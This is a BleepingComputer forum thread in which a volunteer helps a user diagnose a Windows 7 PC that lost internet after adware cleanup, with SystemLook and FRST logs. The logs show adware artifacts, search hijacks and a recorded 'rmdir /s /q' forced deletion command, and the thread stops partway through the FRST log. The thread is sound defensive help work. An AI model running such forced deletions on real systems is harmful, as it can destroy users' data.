Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Lost Internet after Malwarebytes cleaned computer


  • This topic is locked This topic is locked
29 replies to this topic

#1 dougsgirl

dougsgirl

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 12:43 PM

My son brought me this computer from a friend of his, asked me if I could clean up the pop ups on it. Sure I can -_-....I've never had this problem before with cleaning up pop ups and such. When I received this computer it would connect to the internet but had so many pop up issues that it took forever to do anything. I used Malwarebytes and put a free antivirus program on the computer. Restarted the computer and no internet. It's a desktop and wired connected. Again this is not my computer but would appreciate some help getting this back online seeing as it was connecting when I started with it :-)  

 

 

Mod Edit:  Moved from AII to MRL per MRT request - Hamluis.


Edited by hamluis, 18 January 2016 - 02:41 PM.
Moved from Win 7 to Am I Infected - Hamluis.


BC AdBot (Login to Remove)

 


#2 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:18 AM

Posted 18 January 2016 - 01:28 PM

:welcome: to BleepingComputer.

Hi there,

my name is Jo and I will help you with your computer problems.


Please follow these guidelines:
  • Read and follow the instructions in the sequence they are posted.
  • print or copy & save instructions.
  • back up all your private data / music / important files on another (external) drive before using our tools.
  • Do not install / uninstall any applications, unless otherwise instructed.
  • Use only that tools you have been instructed to use.
  • Copy and Paste the log files inside your post, unless otherwise instructed.
  • Ask for clarification, if you have any questions.
  • Stay with this topic til you get the all clean post.
  • My first language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

***


Scan with SystemLook
  • Please download SystemLook (32-bit) by jpshortstuff and save it to your desktop
  • Please download SystemLook (64-bit) by jpshortstuff and save it to your desktop For 64-bit users
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following code box into the main textfield:
:reg 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

:regfind
DNS Unlocker
DNSUnlocker
DNSPRESTONSBURG
cloudguard
System32\Tasks
Windows\Tasks
NameServer
DhcpNameServer

:folderfind
C:\Program Files (x86)\DNS Unlocker

:filefind
C:\Windows\System32\Tasks\DNSPRESTONSBURG
  • Click the Look button to start the scan (may take 5 ... 15 min.)
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
  • Please copy and paste the log to your reply.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#3 dougsgirl

dougsgirl
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 01:49 PM

I'm using my laptop to post and having to use a flash drive to transfer programs back and forth that you tell me to download...just thought I'd let you know that. 

Posting the SystemLook file

SystemLook 30.07.11 by jpshortstuff
Log created at 01:44 on 01/01/2016 by Nexus Media Server
Administrator - Elevation successful
 
========== reg ==========
 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s"
"LogMeIn GUI"=""C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe""
 
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader"=""C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot"
"SpybotSD TeaTimer"="C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe"
"Itibiti.exe"="C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe"
"BYRUA_AGENT"=""C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start"
"Boxee"=""C:\Program Files (x86)\Boxee\Boxee.exe" -startup"
"AnyDVD"="C:\Program Files (x86)\SlySoft\AnyDVD\AnyDVDtray.exe"
 
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
(No values found)
 
 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
(No values found)
 
 
========== regfind ==========
 
Searching for "DNS Unlocker"
No data found.
 
Searching for "DNSUnlocker"
No data found.
 
Searching for "DNSPRESTONSBURG"
No data found.
 
Searching for "cloudguard"
No data found.
 
Searching for "System32\Tasks"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32]
@="C:\Windows\system32\taskschd.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C86F320-DEE3-4DD1-B972-A303F26B061E}\InprocServer32]
@="C:\Windows\system32\TaskSchdPS.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{e34cb9f1-c7f7-424c-be29-027dcc09363a}\1.0\0\win64]
@="C:\Windows\system32\taskschd.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\TypeLib\{e34cb9f1-c7f7-424c-be29-027dcc09363a}\1.0\0\win64]
@="C:\Windows\system32\taskschd.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\TypeLib\{e34cb9f1-c7f7-424c-be29-027dcc09363a}\1.0\0\win64]
@="C:\Windows\system32\taskschd.dll"
 
Searching for "Windows\Tasks"
No data found.
 
Searching for "NameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options\44]
"RegLocation"="SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_?\DhcpNameServerList SYSTEM\CurrentControlSet\Services\NetBT\Adapters\?\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options\6]
"RegLocation"="SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpNameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\Interfaces\Tcpip_{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"NameServerList"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\Interfaces\Tcpip_{A10BA722-1681-4820-B429-9290EFBDD215}]
"NameServerList"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters]
"NameServer"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"NameServer"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"NameServer"=""
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"DhcpNameServer"="192.168.42.129"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Dhcp\Parameters\Options\44]
"RegLocation"="SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_?\DhcpNameServerList SYSTEM\CurrentControlSet\Services\NetBT\Adapters\?\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Dhcp\Parameters\Options\6]
"RegLocation"="SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpNameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\NetBT\Parameters\Interfaces\Tcpip_{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"NameServerList"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\NetBT\Parameters\Interfaces\Tcpip_{A10BA722-1681-4820-B429-9290EFBDD215}]
"NameServerList"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters]
"NameServer"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"NameServer"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"NameServer"=""
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"DhcpNameServer"="192.168.42.129"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Dhcp\Parameters\Options\44]
"RegLocation"="SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_?\DhcpNameServerList SYSTEM\CurrentControlSet\Services\NetBT\Adapters\?\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Dhcp\Parameters\Options\6]
"RegLocation"="SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpNameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces\Tcpip_{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"NameServerList"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces\Tcpip_{A10BA722-1681-4820-B429-9290EFBDD215}]
"NameServerList"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters]
"NameServer"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"NameServer"=" "
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"NameServer"=""
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"DhcpNameServer"="192.168.42.129"
 
Searching for "DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options\44]
"RegLocation"="SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_?\DhcpNameServerList SYSTEM\CurrentControlSet\Services\NetBT\Adapters\?\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\Options\6]
"RegLocation"="SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpNameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"DhcpNameServer"="192.168.42.129"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Dhcp\Parameters\Options\44]
"RegLocation"="SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_?\DhcpNameServerList SYSTEM\CurrentControlSet\Services\NetBT\Adapters\?\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Dhcp\Parameters\Options\6]
"RegLocation"="SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpNameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"DhcpNameServer"="192.168.42.129"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Dhcp\Parameters\Options\44]
"RegLocation"="SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_?\DhcpNameServerList SYSTEM\CurrentControlSet\Services\NetBT\Adapters\?\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Dhcp\Parameters\Options\6]
"RegLocation"="SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\?\DhcpNameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DhcpNameServer"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}]
"DhcpNameServer"="209.18.47.61 209.18.47.62"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}]
"DhcpNameServer"="192.168.42.129"
 
========== folderfind ==========
 
Searching for "C:\Program Files (x86)\DNS Unlocker"
No folders found.
 
========== filefind ==========
 
Searching for "C:\Windows\System32\Tasks\DNSPRESTONSBURG"
No files found.
 
-= EOF =-


#4 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:18 AM

Posted 18 January 2016 - 01:53 PM

Will ask the mods to move topic to the MRL forum because we need to use FRST logs and scripting.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#5 dougsgirl

dougsgirl
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 02:00 PM

Thank you 



#6 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:18 AM

Posted 18 January 2016 - 02:56 PM

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#7 dougsgirl

dougsgirl
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 03:10 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:17-01-2015
Ran by Nexus Media Server (administrator) on NEXUS_MEDIA_SVR (01-01-2016 03:06:07)
Running from C:\Users\Nexus Media Server\Desktop
Loaded Profiles: Nexus Media Server (Available Profiles: Nexus Media Server & LogMeInRemoteUser)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\YTDownloader\BrowserHelperSrv.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Hefei Hejunzhengce Info Tech Co., Ltd.) C:\Program Files (x86)\Windows Audio\R1\AudioSrv.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Safer Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(YTDownloader) C:\Program Files (x86)\YTDownloader\YTDownloader.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
() C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe
(SlySoft, Inc.) C:\Program Files (x86)\SlySoft\AnyDVD\AnyDVDtray.exe
(PU-App) C:\Users\Nexus Media Server\AppData\Local\ylbhvtety0k4bjh\ynbhbzfwy184dth.exe
(SAMSUNG Electornics Co., Ltd.) C:\Users\Nexus Media Server\AppData\Roaming\Verizon\UA_ar\UA.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Goobzo) C:\Program Files (x86)\YTDownloader\BrowserHelper.exe
() C:\Program Files (x86)\SlySoft\AnyDVD\ADvdDiscHlp64.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\System32\dinotify.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8114720 2009-09-11] (Realtek Semiconductor)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2011-01-11] (LogMeIn, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [102400 2010-04-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\857\g2ax_winlogonx64.dll [X]
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\Run: [YTDownloader] => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [1988528 2015-04-22] (YTDownloader)
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\Run: [SpybotSD TeaTimer] => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe [2260480 2009-03-05] (Safer-Networking Ltd.)
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\Run: [Itibiti.exe] => C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe [7342080 2013-06-26] ()
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\Run: [BYRUA_AGENT] => C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [400880 2015-07-16] (LG Electronics)
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\Run: [Boxee] => C:\Program Files (x86)\Boxee\Boxee.exe [19456000 2010-10-31] (boxee.tv)
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\Run: [AnyDVD] => C:\Program Files (x86)\SlySoft\AnyDVD\AnyDVDtray.exe [5201528 2011-07-19] (SlySoft, Inc.)
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\MountPoints2: {09a8187c-cfee-11e3-9c83-1c6f65ad29e4} - K:\ToolLauncher-Bootstrap.exe
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\MountPoints2: {5761b528-ba16-11e5-99dc-1c6f65ad29e4} - K:\LaunchU3.exe -a
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\MountPoints2: {9a659b3e-ba88-11e2-bd20-1c6f65ad29e4} - K:\TL_Bootstrap.exe
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\MountPoints2: {c7222341-0b80-11e4-8586-1c6f65ad29e4} - K:\TL-Bootstrap.exe
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\MountPoints2: {c7222355-0b80-11e4-8586-1c6f65ad29e4} - K:\TL-Bootstrap.exe
HKU\S-1-5-21-2978377406-116969058-805938779-1000\...\MountPoints2: {e57ddf10-a941-11e2-a895-1c6f65ad29e4} - K:\setup.exe -a
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
Startup: C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bm.lnk [2016-01-13]
ShortcutTarget: bm.lnk -> C:\Users\Nexus Media Server\AppData\Local\ylbhvtety0k4bjh\ynbhbzfwy184dth.exe (PU-App)
Startup: C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\loons.lnk [2016-01-13]
ShortcutTarget: loons.lnk -> C:\Users\Nexus Media Server\AppData\Local\ykxhbzfvy244czg\ykxhbzfvy244czg.exe (No File)
Startup: C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Verizon Wireless Software Utility Application for Android - Samsung.lnk [2016-01-13]
ShortcutTarget: Verizon Wireless Software Utility Application for Android - Samsung.lnk ->  (No File)
Startup: C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Verizon Wireless Software Utility Application for Android – Samsung.lnk [2014-04-29]
ShortcutTarget: Verizon Wireless Software Utility Application for Android – Samsung.lnk -> C:\Users\Nexus Media Server\AppData\Roaming\Verizon\UA_ar\UA.exe (SAMSUNG Electornics Co., Ltd.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\Parameters: [NameServer]  
Tcpip\..\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}: [NameServer]  
Tcpip\..\Interfaces\{741C0B6C-8464-40A4-ACF3-17FD982F9310}: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{A10BA722-1681-4820-B429-9290EFBDD215}: [DhcpNameServer] 192.168.42.129
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2978377406-116969058-805938779-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.aol.com/?mtmhp=txtlnkusaolp00000800
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.aol.com/?mtmhp=txtlnkusaolp00000800
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKU\S-1-5-21-2978377406-116969058-805938779-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.aol.com/?mtmhp=txtlnkusaolp00000800
URLSearchHook: HKLM-x32 -> Default = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D}
SearchScopes: HKLM -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = 
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {A3CB1DBF-84A2-4510-9CB8-A041813AE8B9} URL = 
SearchScopes: HKU\.DEFAULT -> {4C4C7AAB-5854-4241-A414-E2F1EF119C4A} URL = hxxp://www.dnsbasic.com/?prt=DNSBASIC123&sp=&keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> DefaultScope {A3CB1DBF-84A2-4510-9CB8-A041813AE8B9} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {4C4C7AAB-5854-4241-A414-E2F1EF119C4A} URL = hxxp://www.dnsbasic.com/?prt=dnsbsc50r1&sp=&keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = 
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {C5DCB956-823D-4CFE-B643-355749621DA4} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-2978377406-116969058-805938779-1000 -> {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = 
BHO-x32: Spybot-S&D IE Protection -> {53707962-6F74-2D53-2644-206D7942484F} -> C:\Program Files (x86)\Spybot - Search & Destroy\SDHelper.dll [2009-01-26] (Safer Networking Limited)
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
